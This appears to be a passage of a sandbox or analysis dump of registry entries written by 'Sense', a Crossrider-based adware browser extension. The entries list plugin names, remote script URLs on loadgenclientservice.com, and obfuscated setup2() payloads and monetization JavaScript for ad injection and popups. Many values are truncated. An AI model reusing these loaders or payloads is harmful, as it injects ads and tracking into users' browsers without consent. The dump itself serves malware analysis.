hNWY2YzFl', 'fuetdjnmfc'); }"
[HKCU\Software\Sense\Plugins\44]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)
[HKCU\Software\Sense\Plugins\72]
"JavaScript" = "if(appAPI.__should_activate_validation__===true){(function(){var e={WRONG_STRICT_VALUE:Parameter %PARAM_NAME% value is not supported.,WRONG_TYPE:Parameter %PARAM_NAME% is of wrong type. Valid types: [%VALID_TYPES%].,PARAM_IS_MANDATORY:Parameter %PARAM_NAME% is mandatory.,DB_VAL_TOO_LARGE:appAPI.db storage is limited to 1000 bytes per key. For larger values please use appAPI.db.async};var a=function(m){return m.charAt(0).toUpperCase() m.slice(1);};var h={};var b=appAPI.appInfo.name;var i=function(o,r,q,p){if(typeof p===undefined){p=;}var n=[ new Date().toDateString() new Date().toLocaleTimeString() ] b;var m=;if(typeof console!==undefined){if((q===e.DB_VAL_TOO_LARGE)&&(typeof console.warn===function)){console.warn(n m);}else{if(typeof console.error===function){console.error(n m);}else{if(typeof console.log===function){console.log(n m);}}}}return;};var l=function(p,n,o){var m=p-"
[HKCU\Software\Sense\Plugins\39]
"Version" = "5"
[HKCU\Software\Sense\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"
[HKCU\Software\Sense\Plugins\269]
"Name" = "stats_ie"
[HKCU\Software\Sense\Plugins\39]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""
[HKCU\Software\Sense\Manifest]
"ModeType" = "production"
[HKCU\Software\Sense\Plugins\180]
"Name" = "bpo_serp_m"
[HKCU\Software\Sense\Plugins\46]
"Version" = "5"
[HKCU\Software\Sense\Plugins\239]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY3YzY3NGYxYjE4MTIwODI3MTMwODU0NTQ0ZDUxMDQxMjBjMDI1YjRiNTkwZjFlMDExYTRiMTk1YzAwMGYxNzAzMGMxYTA0MDI1NjFjMDQxMDU5MWQwOTVjNWQ1MTQ4NDI0ZTU1NDY1YTU1NWQwNjE1NWE1ZTZiNmQ1NDA2MTkwNzFjMTUyZDAwMGQ0NjRjNGU0ZjFiMTgxMjA4MDE1YjRiNTkwZjFlMDExYTRiMTk1YzAwMGYxNzAzMGMxYTA0MDI1NjFjMDQxMDU5MWQwOTVjNWQ1MTQ4NDI0ZTU1NDY1YTU1NWQwNjE1NWE1ZTZiNmQ1NDFlMDEwNjBiMGYxNjNiMDU0NjRjNGU1ZjQwNTU0YTcyNTI0MTQ0NTY0YzFiMTYxZTEyMTExMTAwMDg1NDU0NGQyODRlMDcxYzAxNDMzOTVhNjQ0ZDUzNGM0NjVhMWIwZjA4MWYwMDA4MzkzZjQ0NDI1MjQzMTMxZjAwMDkxYzFiNDgyNzAwMTcxZTQ3NTk1ZDQzMTQ1NzQ4NDY1OTQ0NGI0ZTE2NTM0YjE2MGQxMDBkMGQwNTA2MDgwMTMzMTUwZDEwMDgwMDUxNTQ0ZDU0MzMzOTNiMjAyZTM3MjUzYzI0MzcyOTM0MjczNzM5MzAzMzIwMjkzNjI4MzkyYjI3MjMzYjNmMmEzMjJjNGI0YTU4NTUwMDAwMTIwMTAzMWQwZDBiMWQ1NTViNDQ1MTMxMzIzMDNlMjkyYjIxMzMyZDMyMmIzZjJjMmQzNjI4MmQyZjI1M2IyYjMyMmM0YjFiNDM1MDZiMTk=', 'dvnmslfxra'); }"
[HKCU\Software\Sense\Plugins\93]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/93.js"
[HKCU\Software\Sense\Plugins\38]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/38.js"
[HKCU\Software\Sense\Plugins\43]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/43.js"
[HKCU\Software\Sense\Plugins\263]
"Name" = "intext_5_j_m"
[HKCU\Software\Sense\Plugins\35]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/35.js"
"Name" = "IEAjax"
[HKCU\Software\Sense\Plugins\21]
"JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,."
[HKCU\Software\Sense\Plugins\281]
"Version" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Sense\Installer]
"ErrorsDomain" = "http://errors.loadgenclientservice.com"
"DefaultBrowser" = "ie"
[HKCU\Software\Sense\Manifest]
"UpdateInterval" = "360"
[HKCU\Software\Sense\Plugins\14]
"Name" = "CrossriderUtils"
[HKCU\Software\Sense\Plugins\182]
"Version" = "3"
[HKCU\Software\Sense\Manifest]
"Name" = "Sense"
[HKCU\Software\Sense\Plugins\47]
"Name" = "resources_background"
[HKCU\Software\Sense\Installer]
"StatsDomain" = "http://stats.loadgenclientservice.com"
[HKCU\Software\Sense\Plugins\262]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDE2ZjU2NDc0YTU0NGUwMzAwMWYwYTMwMDQwYjQ4NGU0YzQ5MWMxZjBlMTU0YzQ4NDUxNzA4MDUxNzBhMTkwZDEzNTY0NzE1NDIwYTFmMGExNzA0MWYwZjBlNWEwMjBlMDA0NDA5MTAxNDQ4MWM0NzVlNWE0ZDA5MWU0YTI5MzgyOTI2MjMzODI3MzkzMzIxMzMzNTM1MjczOTI5MmIyMjNlM2EyOTQ4MDY1YTA2MTg0YjFiMTMwMTRiNTY1ZDQ2NWM0ZDExMTMwZTU4MjkzODI5MjYyMzM4MjczOTMzMjEzMzM1MzUzNTNjM2IyYjI1M2IyODMzMzgzNTUyMWYxMjA3MWYxZjA4MWYwMzU3MmIzMzI4MjYyNDI5MzYyNDJlMmUzMTNlMzQzZDI1MjkzMTM3MmIyNjMxM2UzNDIxMzgzZjM3MjkyZTJlMmIzMzQ5NTg2MTVhNDU1NjQ3NDgxYzE4MWYwNDE4MmYxNzFhNDU1MDU0NGUwMzAwMWYwYTE2NGM0ODQ1MTcwODA1MTcwYTE5MGQxMzU2NDcxNTQyMGExZjBhMTcwNDFmMGYwZTVhMDIwZTAwNDQwOTEwMTQ0ODFjNDc1ZTVhNGQwOTFlNGEyOTM4MjkyNjIzMzgyNzM5MzMyMTMzMzUzNTI3MzkyOTJiMjIzZTNhMjk0ODA2NWEwNjE4NGIxYjEzMDE0YjU2NWQ0NjVjNGQxMTEzMGU1ODI5MzgyOTI2MjMzODI3MzkzMzIxMzMzNTM1MzUzYzNiMmIyNTNiMjgzMzM4MzU1MjFmMTIwNzFmMWYwODFmMDM1NzJiMzMyODI2MjQyOTM2MjQyZTJlMzEzZTM0M2QyNTI5MzEzNzJiMjYzMTNlMzQyMTM4M2YzNzI5MmUyZTJiMzM0OTU4NjE1YTQ1NTY0NzQ4MDQwMDFlMTMwMjE0MmMxMjQ1NTA1NDVlNWQ0NjYxMDc=', 'zevgjtlktk'd-"
[HKCU\Software\Sense\Plugins\14]
"Version" = "11"
[HKCU\Software\Sense\Plugins\28]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/28.js"
[HKCU\Software\Sense\Plugins\262]
"Version" = "1"
[HKCU\Software\Sense\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 CE 23 C2 4B 20 E3 95 CF D7 28 D7 4F 4B BD 28"
[HKCU\Software\Sense\Plugins\242]
"Name" = "price_gong_m"
[HKCU\Software\Sense\Plugins\44]
"Name" = "IEMisc"
[HKCU\Software\Sense\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,7,9,93,102,123,180,184,191,192,220,221,223,239,242,244,262,263,281,177,91,28"
[HKCU\Software\Sense\Plugins\43]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to pars-"
[HKCU\Software\Sense\Plugins\91]
"Name" = "monetizationLoader.js"
[HKCU\Software\Sense\Plugins\9]
"Version" = "3"
[HKCU\Software\Sense\Plugins\22]
"Version" = "5"
[HKCU\Software\Sense\Plugins\281]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/281.js"
[HKCU\Software\Sense\Plugins\191]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE3OTc5NGEwYzA0MDUxZTM5MDAwNjUxNGE0ODQ2MTgwNTFhMWM0ODQ1NWMxMzAxMTEwNjFlNDAwZjFkMDc1YzFkMGQwMDE5MTA0MTBlMWQwNTE4MWQwOTE2MWIxZDBiMTg1ZDFhMDExOTBiMDEwMzAxMGYxZTAwMDUwNDVlMDUwZDFlNWYwNDFmNTA0Njc5Nzk0YTBjMDQwNTFlMWYyNzE4MWY1MjUyNDQ1MjE5MWExODAyMTk0OTVmNDcxNzE1MTIxYjFlMTc0NDEwMTkxZDEyMWY1ZjBkMDMxZjQ1MWUxNTBjMGQxMTVlMGMwMzFkMDExZTExMWEwZjFjMTQxYTQzMDIxODFhMTMwZDE3MDAxMDFjMWUxZDFkNWQxZDAxMGE1ZTFiMWQ0ZTVlNjA3YTUyMTgwODA1MTYwNzAyM2IwZTUxNGE0ODU1NDk0MDQyNjY1MjRhNTM1MDRhMGQxZTFkMDcwMjE3MjAyMDUyNTI0NDUyMTgwODRjNWExZTBhMDAwZDBiMTY1MTE5MDUxYzBlMWMwNzQ2M2IxMzE4MWIxYTFkMWEwMTE1MGUxNzUwNGM1MzUxNTI0ZDA2MWUwYzAxMTYxODAwMDkxNjRkNWE1MDFmMGQxZTE1MDExYjVjMzUxMDE5MWQxMjFmMDExYzA5MTQxOTUzNGQ0ODFmMGQ0YTRlNGMwNTAzMWQxNDA3MTM1ZTJlMGQwNTA3MWMxYzAwMWEwMTE2MDI0MDFjMDAwMzEwMTUxYjE0MTEwMzFjMDMwNTRhNGU1MDEzNDMxMzEwMDMxYzEzMDMxNDFlNGY1ZTUwNTYwZDFlMWQxOTAwMDIwMTAwMTUwMzMxMzMzMTM4M2MyMzNiMzYzOTM1MmIzZTJkMmYyYjI0MmQyYTM0MzQyYTMzMjEzZjMxMmYyMTIwMmYyZTQ5NDA1MjRkMDYwNTAxMDA1NzRiNGU0YjJkMzUzMDIyMjczNzIzMjMx-"
[HKCU\Software\Sense\Plugins\45]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===n-"
[HKCU\Software\Sense\Plugins\182]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]â´."
[HKCU\Software\Sense\Plugins\7]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/7.js"
[HKCU\Software\Sense\Installer]
"zdata" = "0"
[HKCU\Software\Sense\Plugins\64]
"JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){-"
[HKCU\Software\Sense\Plugins\221]
"Version" = "4"
[HKCU\Software\Sense\Plugins\14]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/14.js"
[HKCU\Software\Sense\Plugins\246]
"Version" = "15"
[HKCU\Software\Sense\Plugins\3]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/3.js"
[HKCU\Software\Sense\Plugins\21]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/21.js"
[HKCU\Software\Sense\Plugins\36]
"Name" = "IEBackground"
[HKCU\Software\Sense\Plugins\4]
"Version" = "5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Sense\Plugins\37]
"Version" = "6"
[HKCU\Software\Sense\Plugins\93]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE2ZTY4NTUwYzFhMTkxYTI1MTQwNjQ2NWI1NzQ2MDYxOTFlMDA1YzQ1NGIxNjAwMTM0MDFlMWYwMDAzMTgwMjA4MDQwYzQwMGUwNTFkNDkxZDE3NGUwNDAyMzEwMDBiMTkwODQ0MGUxMjA3NWIwYTAxMTkxZjEzMTgwNzA0NGEwYzA2MWIxMDFkMGYwMTEzNDcwMjE3MGIxZjIzMTQ1YjBiMDYwMjUxMjczYTI0MmU0ZDM5MzUyNzMzMzgzNzNkM2YyMzM0MjMzODNiMjQyZjMwMmIyMzJlMzUyMjM1MzczNDM1M2IyNzI5MzUyZjQwMWEwNTEzMDMwYTBiMWYwNDExMGIwZjU5M2UyODI3M2MyMjM5MjMzNDIzMjAyNDI1M2IyZjNkM2EyZjI4MmIyOTI0MjgzYjRjNDE2MDc5NDQwMjEwMTUwNzE3M2IxZjA2NTI1YzRhNDYwOTAzMTAxZTFlNTA1ZjQ5MWQxMzE2NTkxNzFiMWQwZjAyMDAwMzE3MDk1OTA3MDEwMDQ1MDcxNTQ1MTcwNzI4MDkwZjA0MDQ1ZTBjMTkxNDVlMTMwODFkMDIxZjAyMDUwZjU5MDkxZjEyMTQwMDAzMWIxMTRjMTExMjEyMTYyNzA5NTcxMTA0MDk0MjIyMjMyZDJhNTAzNTJmMjUzODJiMzIyNDM2MjcyOTJmMjIzOTJmM2MzNTMyMmEyYTI4MmUyZjM1M2YyNjNlM2UyMDMxMzI0YzAwMDcxODEwMGYxMjE2MDAwYzA3MTU1YjM1M2IyMjI1MmIzZDNlMzgzOTIyMmYzNjNlMzYzNDNlMzIyNDMxMmIyZjNiM2U1NTQ4NjQ2NDQ4MDAwYTFmMDMwODE5MmQwYTRmNTA1MDVmNTk2ZTFj', 'jdawdnmjpf'); }"
[HKCU\Software\Sense\Manifest]
"SetNewTab" = "false"
[HKCU\Software\Sense\Plugins\47]
"JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:[""\x68\x74\x74\x70\x3a\x2f\x2f\x72""
[HKCU\Software\Sense\Plugins\220]
"JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(g){var p=appAPI.isDebugMode();var n=p||appAPI.internal.db.get(icm_debug)||appAPI.dom.location.href.indexOf(icm_inline_debugger)>-1;var k=http://static.icmwebserv.com/mc/;var d={namespace:a.namespace,marketingCampaignID:(function(){var q={LITE:999999,DOWNLOADS:777777,AJILLION:888888}[a.namespace];if(a.source==JS){q=q-1;}return q;})(),campaignID:(function(){try{return appAPI.internal.monetization.getCampaignId();}catch(q){return0;}})(),subID:(function(){try{return appAPI.internal.monetization.getExtendedSubId();}catch(q){try{return appAPI.internal.monetization.getSubId();}catch(q){return100012322500000000;}}})(),IBIC:(function(){try{return appAPI.installer.getUserId();}catch(q){return0;}})(),DBPrefix:(function(){return{LITE:__ICM_LITE__,DOWNLOADS:__ICM_DOWNLOADS__,AJILLION:__ICM_AJILLION__}[a.namespace];})(),RevMode:(function(){return a.revMode||{LITE:2,DOWNLOADS|-"
[HKCU\Software\Sense\Plugins\177]
"Version" = "2"
[HKCU\Software\Sense\Plugins\22]
"JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}el-"
[HKCU\Software\Sense\Code]
"NewTabJavaScript" = ""
[HKCU\Software\Sense\Plugins\78]
"JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)
[HKCU\Software\Sense\Plugins\42]
"Name" = "IEInternal"
[HKCU\Software\Sense\Plugins\102]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGU3OTQzNDk1MTVhNDExODAyMTkwNTI2MTEwNTUzNDA0MzUyMWUxOTAxMDM1OTQ2NWUxMzRkMTMwNDA5MDcxNzEzMDMwMjU0MGExZTEwMDI1YTEwMTEwZDAzNTUwOTExMDAwYzA2MTAxMTAwMDEwZTRkMWEwNTUyMTYxYjAyMDcxZjFmMGY0ZDE1MWYxMTAxM2MzNjJlMzkzMTNmMjUzZTI3M2EyNzJjMjMyNTI2MjgyMjI4M2IzNzI2MmQyZTI5MzYzMjI5MjQzMTJjM2M0ZjEwMGExMzI0MWYxOTE5MTY1ZTM2MmUzOTMxM2YyNTNlMjczYTI3MmMyMzI1MjIyMDI2MzIzYjMyMmUyYzJlMjU0NTE4MWYwOTQ4MmMzYzJhMjMzNTMwMjMyNDI0MzEzNjMxMzYyNDI5MjYyMjI5MjQzMTJjM2M0YjVkNzA0MzUwNTY0ZDU3MWIxNzFkMDEwOTM2MDIxYTRmNGY1MzQxMDEwNTBlMTMwMzRjNDI1YTFhM2MwYTAzMWUxMTE0MDYwNzA2MmMwYTA3MTcxNTRkMDQxYTFlMTYxNzBkNDcxMjE1MGU1ZjE1MWYxMTAxNGMwMzEwMGMwMjAzMTUxZjFjMDMxNzQ3MWIwOTVjMTMxZTBjMWIxZDA2MDU0YzE5MTExNDA0MzIyYTJjMjAzYjNlMjkzMDIyM2YyOTMwMjEzYzJjMjkyZTI2M2UzMjI4MzEyYzMwM2MzMzI1MmEzNDI5MzI1MzEyMTMxOTI1MTMxNzFjMTM1MDJhMmMyMDNiM2UyOTMwMjIzZjI5MzAyMTNjMjgyMTJhM2MzZTM3MjAzMDJjM2M0ZjE5MTMwNzRkMjkzMjM2MjEyYzNhMjIyODJhMzQzMzNmMmEyNjMwMmMyMzI1MmEzNDI5MzI1NzVmNDM0OTUxNWE2OTUwNTY0ZDU1NTExMzA1MDQxZDBhMWUzZjA5NTc0OTQzNTg0MTQ4Njki-"
[HKCU\Software\Sense\Plugins\36]
"Version" = "8"
[HKCU\Software\Sense\Plugins\184]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/184.js"
[HKCU\Software\Sense\Plugins\244]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/244.js"
[HKCU\Software\Sense\Plugins\239]
"Name" = "revizer_ws_dynamic_b2b_safe_m"
[HKCU\Software\Sense\Plugins\47]
"Version" = "3"
[HKCU\Software\Sense\Plugins\242]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/242.js"
[HKCU\Software\Sense\Plugins\35]
"Version" = "4"
[HKCU\Software\Sense\Plugins\183]
"Name" = "tabsWrapper"
[HKCU\Software\Sense\Plugins\223]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ2NjY1NWExMjBjMTUxZTJkMTgxYTRlNTY1ODU4MTAxNTFhMDg1MDU5NDMwZjFjMTQ1NjE3MDcwYjBiMTIwODQyMWIxNTE1NGUxZDFiMTgxZjFjMTg1NzRiNGM1NDU4NGY1ZDQ0NTk1YjRlNGY1NzExMWMxZDA2MTkwZDA4NTYxMDBiNWUxZDBkMDgxZjA4NTEyNzI1M2IzMzIxMmIzOTI0MjUyODNkMjgyNzI0MzYyYzJmMzgyODI5M2MyNTJiMzQyYzI3MjMzMjMzMzM1ZTBmMTU1YzMxMjcyOTI0MjMzZjJiMjgzMTI1MmIyYTM1MzczYzNjMjczNDM5MmMyYjI3MzU1NDQwNjY3MTU4MTAxNTFhMDgxOTIzMWUwMDVhNDA1ODQzMDYwYzFlMDYxZjU2NTc1NTFiMDUwMDU2MWMxZjFmMGQxYzFlNTYwMjAxMTU0NTA1MGYxZTExMGEwYzRlNWY0YzVmNDA1YjViNGE0ZjRmNTc1YjU3MWEwNDA5MDAxNzFiMWM0ZjA0MGI1NTA1MTkwZTExMWU0NTNlMzEzYjM4MzkzZjNmMmEzMzNjMjQzYzI3MmYyZTM4MjkzNjNlM2QyNTMxMmIzZjM0MzMyNTNjMjUyNzQ3MWIxNTU3MjkzMzJmMmEzNTJiMzIzYzMxMmUzMzNlMzMzOTJhMjgzZTIwMzkyNzMzMzMzMzVhNTY3MjY4NGMwODA2MDMwYjA1MTYzMzFjNDM1NDU4NTg0NDVmNjYwNQ==', 'vllxzxanxj'); }"
[HKCU\Software\Sense\Plugins\184]
"Version" = "10"
[HKCU\Software\Sense\Plugins\123]
"Name" = "intext_adv_m"
[HKCU\Software\Sense\Plugins\269]
"Version" = "1"
[HKCU\Software\Sense]
"ActiveAppId" = "61915"
[HKCU\Software\Sense\Plugins\17]
"Name" = "jQuery"
[HKCU\Software\Sense\Manifest]
"Manifest" = "NA"
[HKCU\Software\Sense\Plugins\78]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/78.js"
[HKCU\Software\Sense\Plugins\2]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/2.js"
[HKCU\Software\Sense\Plugins\91]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/91.js"
[HKCU\Software\Sense\Plugins\123]
"Version" = "12"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Sense\Plugins\72]
"Version" = "5"
[HKCU\Software\Sense\Plugins\221]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/221.js"
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"
[HKCU\Software\Sense\Plugins\269]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/269.js"
[HKCU\Software\Sense\Plugins\72]
"Name" = "appApiValidation"
[HKCU\Software\Sense\Plugins\13]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/13.js"
[HKCU\Software\Sense\Plugins\37]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100),focusTimer:(typeof b.focusTimer===number?b.focusTimer:0),focusDelay:(typeof b.focusDelay===number?b.focusDelay:0)};appAPI.-"
[HKCU\Software\Sense\Plugins\9]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/9.js"
[HKCU\Software\Sense\Plugins\41]
"Name" = "IEInfo"
[HKCU\Software\Sense\Plugins\39]
"Name" = "IEDatabase"
[HKCU\Software\Sense\Plugins\244]
